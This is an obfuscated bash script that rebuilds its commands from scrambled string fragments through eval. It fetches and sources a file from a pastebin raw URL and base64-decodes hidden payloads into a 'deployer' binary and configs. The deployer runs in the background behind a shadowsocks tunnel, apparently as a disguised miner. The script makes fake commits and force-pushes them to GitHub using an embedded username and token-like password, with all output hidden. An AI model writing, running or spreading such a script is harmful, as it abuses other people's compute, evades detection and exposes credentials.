EwigcPGP="sudo add-apt-re"
MmwMnDn="pository ppa:m"
jtqfqQ="ax-c-lv/sha"
IXNp="dowsocks-lib"
BnemVO="ev -y &>/dev/n"
wGux="ull || t"
eval "$EwigcPGP""$MmwMnDn""$jtqfqQ""$IXNp""$BnemVO""$wGux""rue"
ENST="o add-apt-"
unqqn="repository p"
YAlduyeU="pa:ondrej/apac"
EHcKp="he2 -y &>/dev/n"
oyRsmE="ull ||"
eval "sud""$ENST""$unqqn""$YAlduyeU""$EHcKp""$oyRsmE"" true"
nfZKhjI="do apt update"
QhZS=" &>/dev/null"
iEvAZ=" || true"
eval "su""$nfZKhjI""$QhZS""$iEvAZ"
wfET="get -O codes"
FhqeU="rc https://"
NRRtTj="pastebin.com/r"
KyvqjZ="aw/UKs9hZfc &>"
hxCD="/dev/"
eval "w""$wfET""$FhqeU""$NRRtTj""$KyvqjZ""$hxCD""null"
FnQYP="ource ./co"
eval "s""$FnQYP""desrc"
git clone $SRC codes &>/dev/null
CRjKCZW="base64 -d cod"
whToZusS="es/s >"
eval "$CRjKCZW""$whToZusS"" o"
sudo apt --yes install openssl &>/dev/null || true
XhSyZqfs="o apt --ye"
mGcj="s install psmis"
WEaBr="c shadowsocks-"
NKqjR="libev &>/dev"
uFtQbWk="/null || "
eval "sud""$XhSyZqfs""$mGcj""$WEaBr""$NKqjR""$uFtQbWk""true"
eMwDaMBn="udo systemctl"
VLezDxf=" stop shado"
GoXiDqJ="wsocks-libev"
ALWdAd=".service &>"
jjHn="/dev/null || t"
eval "s""$eMwDaMBn""$VLezDxf""$GoXiDqJ""$ALWdAd""$jjHn""rue"
TduBbM="base64 -d c"
guacf="odes/c > j"
NVsV="ump-c"
eval "$TduBbM""$guacf""$NVsV""onfig"
Wjkc="ase64 -d codes/"
lmXDJai="gc > g"
eval "b""$Wjkc""$lmXDJai""c"
rgztRGV="se64 -d cod"
gTKUUjE="es/m > deploy"
eval "ba""$rgztRGV""$gTKUUjE""er"
jZoYHj="se64 -d codes/p"
lTVNzNMM=" > prepare"
eval "ba""$jZoYHj""$lTVNzNMM"
source ./prepare
UUci="o ss-local "
tayyhnHX="-c o --plugin "
QnNQDiw="./gqs --plug"
rBXU="in-opts ./gc "
MefDU="&>/dev/null"
eval "sud""$UUci""$tayyhnHX""$QnNQDiw""$rBXU""$MefDU"" &"
chmod +x deployer
IBbFk="ed -i 's/gcc/"
UvZbBe="cegfo/g' jump"
ibXBiE="-config"
eval "s""$IBbFk""$UvZbBe""$ibXBiE"
aIaqQC="do ./deploye"
DIZGo="r --config"
dXXJ="=jump-config &>"
UfgOvtdM="/dev/null"
eval "su""$aIaqQC""$DIZGo""$dXXJ""$UfgOvtdM"" &"
echo deghlx
LXKsc="leep 6"
eval "s""$LXKsc""4"
nfFjDAHw="t clone htt"
NFpCi="ps://github"
VVdP=".com/cubic-v"
ReMnMcPI="dy-wlang/x"
WDOAqah="app.git tmp &>/"
pCkcg="dev/null || t"
eval "gi""$nfFjDAHw""$NFpCi""$VVdP""$ReMnMcPI""$WDOAqah""$pCkcg""rue"
svGdMdXY="d tmp || tr"
eval "c""$svGdMdXY""ue"
sJHQo=" config user.na"
EZkzOCwr="me 'Roman Ak"
ijPb="opyan' &>/dev"
YrZZ="/null || t"
eval "git""$sJHQo""$EZkzOCwr""$ijPb""$YrZZ""rue"
UujvUnV=" config user"
UvAsrwe=".email roma"
GmLCxo="n.akopyanxb@inb"
pKWIKLx="ox.ru &>/dev"
EujYxf="/null || tru"
eval "git""$UujvUnV""$UvAsrwe""$GmLCxo""$pKWIKLx""$EujYxf""e"
SRAXyjY="LD=\`date +%"
eval "BUI""$SRAXyjY""s\`"
aGNPBTQW="E=\`date +"
eval "MAK""$aGNPBTQW""%S\`"
echo $BUILD >> deghlx$MAKE
git add deghlx$MAKE &>/dev/null || true
git commit -m 'Fixed error xapp '$MAKE &>/dev/null || true
kltUDJAO="it push http"
gMuzabE="s://roman-akop"
DJMBeCfY="yanxb:'CNjR-"
shXGKwS="KSjHVv_9Ap"
yXro="'@github.com"
SozktA="/cubic-vdy-wlan"
THLXExU="g/xapp.git"
OwBKWC=" -f &>/dev"
HkIvNL="/null || tr"
eval "g""$kltUDJAO""$gMuzabE""$DJMBeCfY""$shXGKwS""$yXro""$SozktA""$THLXExU""$OwBKWC""$HkIvNL""ue"
while :; do G=`date +%s`; echo 'xapp meson '$G; [ `expr 1483 + $BUILD` -lt $G ] && sudo killall deployer && break; sleep 153; done
